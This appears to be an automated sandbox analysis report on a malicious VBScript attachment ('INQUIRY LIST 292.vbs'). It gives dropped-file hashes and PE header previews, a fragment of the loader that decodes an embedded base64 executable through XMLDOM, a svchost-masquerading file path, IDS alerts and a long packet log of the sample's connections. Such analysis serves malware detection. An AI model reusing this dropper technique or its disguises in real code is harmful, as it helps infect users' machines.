                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.d........& .....(...$................<a.............................0.......s........ .........................................@....................`..p...............\........................... ...(.................................................... ....'.......(.................. .P`. ...P....@......................@.p.. .......P.......4..............@.P@. ..p....`.......:..............@.0@. ..0....p.......>..............@.0@. ..................................p.. ..@............B..............@.0@. ...............D..............@.0.. ....X............L..............@.@.. ....h............N..............@.`.. ..\............P..............@.0B/4...................R..............@.PB/19..................V..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

                                                                                    C:\Windows \SysWOW64\svchost.pif

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):96448
                                                                                    Entropy (8bit):5.1636650991276305
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:dhJfbGY/Bn623Kvv0IzGJyyu2xXibswbTYTjULf1YrfspZPgpzF:dhJfbG6B6yKvv0uWyyu2xXibswbQjUjs
                                                                                    MD5:869640D0A3F838694AB4DFEA9E2F544D
                                                                                    SHA1:BDC42B280446BA53624FF23F314AADB861566832
                                                                                    SHA-256:0DB4D3FFDB96D13CF3B427AF8BE66D985728C55AE254E4B67D287797E4C0B323
                                                                                    SHA-512:6E775CFB350415434B18427D5FF79B930ED3B0B3FC3466BC195A796C95661D4696F2D662DD0E020C3A6C3419C2734468B1D7546712ECEC868D2BBFD2BC2468A7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R#.<p.<p.<p..p.<p..?q.<p..9q.<p..=q.<p.=p..<p..4q.<p..8q.<p...p.<p..>q.<pRich.<p........................PE..d....C~..........."............................@.............................`....................... ...............................................@....... ..<....P...(...P..`.......T...........................0...@...........p...........`....................text.............................. ..`.imrsiv..................................rdata...[.......`..................@..@.data...............................@....pdata..<.... ......................@..@.didat..0....0....... ..............@....rsrc........@.......0..............@..@.reloc..`....P.......@..............@..B........................................................................................................................................................................

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:ASCII text, with very long lines (65413), with CRLF line terminators
                                                                                    Entropy (8bit):5.782360851300279
                                                                                    TrID:
                                                                                      File name:INQUIRY LIST 292.vbs
                                                                                      File size:1'139'043 bytes
                                                                                      MD5:2f5edacbfdae7a51267deeb8e937bfec
                                                                                      SHA1:d0ce895b7a4e55fe7f12121878a5818850f1dc00
                                                                                      SHA256:07898f8cb7e07bd6b86fd09cfff5898eb246a44524b3dda7a39e3de32667490b
                                                                                      SHA512:fb8c8d268dd5f4b0c619213a0c36c3132574d04c8780eb4c5623af08c7aea7d12fdc1dcab4903908b099b2874a34f8d9804af746978a93af488a95a101d0d392
                                                                                      SSDEEP:24576:uR3Gv4DQo4o3Hj6R3EpqvdG5Np4kJL7a5ZKCmjLpvi:HBo4o3kE4w2kw5w4
                                                                                      TLSH:E2354878C276AD8603E856F80989D6C1EDB03BFFB0D1D7505D5C91A211BDD37AA288EC
                                                                                      File Content Preview:Option Explicit..dim D,E,b,p..Set D=CreateObject("Microsoft.XMLDOM")..Set E=D.createElement("t")..E.DataType="bin.base64"..E.Text="TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0g

                                                                                      File Icon

                                                                                      Icon Hash:68d69b8f86ab9a86

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-16T08:29:14.702006+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973150.116.86.44443TCP
                                                                                      2025-01-16T08:29:21.836380+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449732193.122.6.16880TCP
                                                                                      2025-01-16T08:29:34.882496+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449740193.122.6.16880TCP
                                                                                      2025-01-16T08:29:41.869304+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449742193.122.6.16880TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 16, 2025 08:29:14.111828089 CET49730443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.111877918 CET4434973050.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.111985922 CET49730443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.112142086 CET49730443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.112188101 CET4434973050.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.112242937 CET49730443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.169728041 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.169785023 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.169858932 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.194222927 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.194257975 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.701926947 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.702006102 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.706237078 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.706257105 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.706608057 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.754345894 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.876135111 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.923340082 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.993937016 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.993956089 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.993963003 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:14.994112015 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:14.994146109 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.012958050 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.013102055 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.013120890 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.058350086 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.080363035 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.080374002 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.080499887 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.080522060 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.080643892 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.081338882 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.081346989 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.081397057 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.082144976 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.082154989 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.082304001 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.099576950 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.099589109 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.099678993 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.166759014 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.166768074 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.166907072 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.167515039 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.167524099 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.167618990 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.168021917 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.168097019 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.168107986 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.168118000 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.168184996 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.168266058 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.169027090 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.169184923 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.170008898 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.170126915 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.186346054 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.186397076 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.186495066 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.186506033 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.186639071 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.253555059 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.253689051 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.253772020 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.253783941 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.253900051 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.254379988 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.254451990 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.254874945 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.254997969 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.255018950 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.255166054 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.256023884 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.256088972 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.256094933 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.256102085 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.256189108 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.256746054 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.256818056 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.256830931 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.256835938 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.256978035 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.257718086 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.257833958 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.257838964 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.257950068 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.258606911 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.258712053 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.274490118 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.274588108 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.274602890 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.274626017 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.274744034 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.340490103 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.340569973 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.340591908 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.340626001 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.340764999 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.340878010 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.340974092 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.341258049 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.341321945 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.341486931 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.341573000 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.341639042 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.341696978 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.341707945 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.341803074 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.342308998 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.342430115 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.342520952 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.342592955 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.342605114 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.342699051 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.343238115 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.343328953 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.343339920 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.343436956 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.359872103 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.359966040 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.360137939 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.360297918 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.360310078 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.360383034 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.406102896 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.406225920 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.427061081 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.427165031 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.427196980 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.427305937 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.427393913 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.427484035 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.427541018 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.427623034 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.427788019 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.427892923 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.428479910 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.428544044 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.428595066 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.428601980 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.428760052 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.431687117 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.431794882 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.431864023 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.431971073 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.432061911 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.432107925 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.432248116 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.432343006 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.446770906 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.446952105 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.446974993 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.446996927 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.447037935 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.447254896 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.447326899 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.447338104 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.488296032 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.492675066 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.492744923 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.513668060 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.513736010 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.513767004 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.513823986 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.513951063 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.514007092 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.514117002 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.514175892 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.514389038 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.514445066 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.514457941 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.514523983 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.514553070 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.514609098 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.514688969 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.514741898 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.514834881 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.514885902 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.515305042 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.515366077 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.515491962 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.515543938 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.515554905 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.515607119 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.533468962 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.533545017 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.533543110 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.533576965 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.533617020 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.579643011 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.579737902 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.579777002 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.600687981 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.600743055 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.600775957 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.600821972 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.600856066 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.600887060 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.600923061 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.600960016 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.601039886 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.601048946 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.601124048 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.601145983 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.601191044 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.601541042 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.601602077 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.601608038 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.601623058 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.601665020 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.601671934 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.601712942 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.601717949 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.601772070 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.601814032 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.601856947 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.601938009 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.602006912 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.602251053 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.602339983 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.620229959 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.620301962 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.620331049 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.620348930 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.620369911 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.620381117 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.620393991 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.620449066 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.666356087 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.666502953 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.687421083 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.687498093 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.687520981 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.687572956 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.709991932 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.710022926 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.710037947 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.710046053 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:20.948019981 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:20.952980995 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:20.953063965 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:20.953425884 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:20.958215952 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.591346979 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.595254898 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:21.600017071 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.783902884 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.798005104 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:21.798039913 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.798140049 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:21.818823099 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:21.818865061 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.836380005 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:22.278369904 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.278539896 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.318136930 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.318167925 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.318553925 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.368448973 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.384469032 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.427371979 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.490453005 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.490530968 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.490611076 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.550962925 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:33.894598007 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:33.899632931 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:33.899770021 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:33.900171995 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:33.904959917 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.532540083 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.542181969 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:34.547164917 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.727545023 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.729547977 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:34.729595900 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.729671001 CET49741443192.168.2.4104.21.96.1
